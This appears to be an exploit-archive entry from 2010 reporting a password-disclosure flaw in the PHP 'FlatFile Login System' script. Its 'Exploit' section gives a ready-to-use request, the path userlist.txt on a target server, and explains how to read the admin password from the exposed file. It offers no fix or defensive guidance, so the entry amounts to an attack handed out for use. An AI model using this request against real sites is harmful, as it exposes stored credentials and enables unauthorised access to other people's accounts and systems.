id: 10993
date: 02/20/2010
title: FlatFile Login System Remote Password Disclosure Vulnerability
author: ViRuSMaN
cves: 

==============================================================
FlatFile Login System Remote Password Disclosure Vulnerability
==============================================================


==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] FlatFile system Remote Password Disclouse Vulnerability
==============================================================================
 
    [»] Script:             [ FlatFile ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://codewalkers.com/codefiles/269_flatfile_login.zip ]

###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/userlist.txt
 
 # The Password Before Admin Name in "userlist.txt"
 
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-22]  #